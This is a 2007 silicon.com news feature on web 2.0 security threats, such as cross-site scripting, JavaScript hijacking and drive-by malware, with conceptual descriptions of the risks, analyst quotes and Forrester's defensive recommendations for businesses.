To print: Click here or Select File and then Print from your browser's menu

This story was printed from silicon.com, located at http://www.silicon.com/

Story URL: http://www.silicon.com/research/specialreports/digitaldefences/0,3800014341,39169267,00.htm

Web 2.0 threat looms
So what can organisations do about it?

By Anthony Plewes

Published: Monday 26 November 2007

The web is already the main target for security attacks. Now the functionality of dynamic web 2.0 applications is providing new ways to compromise machines. Anthony Plewes looks at the vulnerabilities and the possible fixes.

Most analysts agree careless use of web 2.0 applications poses a serious threat to computer users. The Yankee Group, for example, last month said web 2.0 is heading for a slow-motion security train wreck.

The analyst firm warns web 2.0 applications could herald widespread identity theft and transaction fraud, give malware a new infection super highway, erode social networks and eventually create a total consumer loss of confidence in the web platform.

Most security threats that affect web 2.0 are not new. They stem from issues with browser design and web architecture that did not anticipate how the web would be used in the future.

Existing vulnerabilities in browsers and Java can allow hackers to compromise users' machines through malware and access confidential information.

Jacob West, manager of the research group at security specialist Fortify Software, said: "Interactive and dynamic web 2.0 applications push content to the client instead of generating static pages on a server. The net effect is that there is a lot more data moving back and forth and a lot more processing taking place on the client."

"The security in the web has always been poor but the proliferation of personal information now available online means that the internet offers low-hanging fruit for criminals," West added.

Mash-ups, for example, pull different sources of information into a single dynamic web page using simple protocols such as Atom and RSS. Mash-ups are powerful because they allow companies to combine internal information with external sources, such as maps or public statistics.

They can however be a major security headache if the third-party source is compromised, because RSS and Atom would simply import the compromised information. This could be executable JavaScript and infect the computer running the mash-up - giving criminals access to a whole range of new hosts.

All computers at risk

Because web 2.0 applications run in browsers all users, regardless of computer platform, are at risk. Mike Smart, European product manager at Secure Computing, said: "The browser has become like another operating system."

"It sits in the host operating system and like a virtual machine can run its applications independently. This allows people to communicate with a huge audience as long as they have a browser and plug-ins that can be downloaded automatically," Smart added.

Browser vulnerabilities such as cross-site scripting (XSS) have the potential to become as prolific as buffer overflow was 10 years ago. Because it can allow attackers to run code in the user's browser, the possibilities are limitless - attackers can hijack a web session, deface websites or introduce malware.

XSS is one of the top 10 web application vulnerabilities identified by the Open Web Application Security Project (OWASP), along with injection attacks and malicious file execution.

Earlier this year, Fortify Software undertook some research into the security implications of web 2.0 and unearthed the JavaScript hijacking vulnerability. Essentially, an attacker can use a malicious page to request information from another site using the user's active session cookie.

In effect, they are using the same techniques as in mash-ups to impersonate their victims to a third-party server. Alarmingly, this could allow an attacker to access a user's internet banking account using their security credentials. This is not just a theoretical threat, it has already been used to compromise Gmail to fraudulently download contact lists.

Trusted sources

The core of many of these problems is that the user is downloading and executing third-party code from what the application designer or user believes is a trusted source.

One fix to this problem is to analyse any code downloaded to the machine to see if it is malicious. This is not as easy as it sounds, as most threats facing users are so-called zero-hour vulnerabilities without a known signature.

But there are ways of identifying the intention of executable code, such as whether it is trying to do something unexpected, such as set up a network connection.

Many website owners are simply unaware they are hosting drive-by malware that can infect users who surf their site or download it through web feeds. Web search giant Google estimated in May 2007 that as many as one in 10 websites was compromised in this way.

Much of the new generation of targeted malware is designed to extract valuable user data that can be used for profit, such as financial information or identity theft. But not all of this data leakage is caused by malware infection.

In some cases, the user volunteers this information quite willingly. For example, information may be inadvertently posted on blogs to a wider audience, or simply emailed to the wrong person.

The greater use of social networking and user-generated content from organisations puts confidential corporate information under serious threat.

Taking action

Although most enterprises are concerned about the security implications of web 2.0 applications, few have taken adequate steps to protect themselves.

A September 2007 survey from analyst firm Forrester, found there were significant concerns in enterprises about the potential of web 2.0 to distribute malware and leak data from the organisation.

Organisations are right to be worried: three-quarters of them had a virus infection within the past 12 months despite the widespread use of URL filtering and antivirus signature scanning. With only a quarter of companies using newer malware fighting techniques, such as behavioural analysis, many of these infections are likely to be the direct result of zero-day attacks invisible to traditional malware protection.

Companies need to update their entire approach to security to cope with the threats posed by web 2.0. Forrester recommends three steps:

1. Re-examine the adequacy of corporate security policies and protection capabilities to deal with web-borne threats.

2. Improve user-awareness on the functionality and vulnerabilities of web 2.0 applications.

3. Deploy technology that can combat web threats, such as advanced web filtering, behavioural analysis and outbound content control.

The web has become the next key security battleground as computer criminals take advantage of the ubiquity of browsers.

Ultimately browser technology needs to be more secure. But in the meantime, businesses and individuals need to beef up their own security measures to deal with this new world.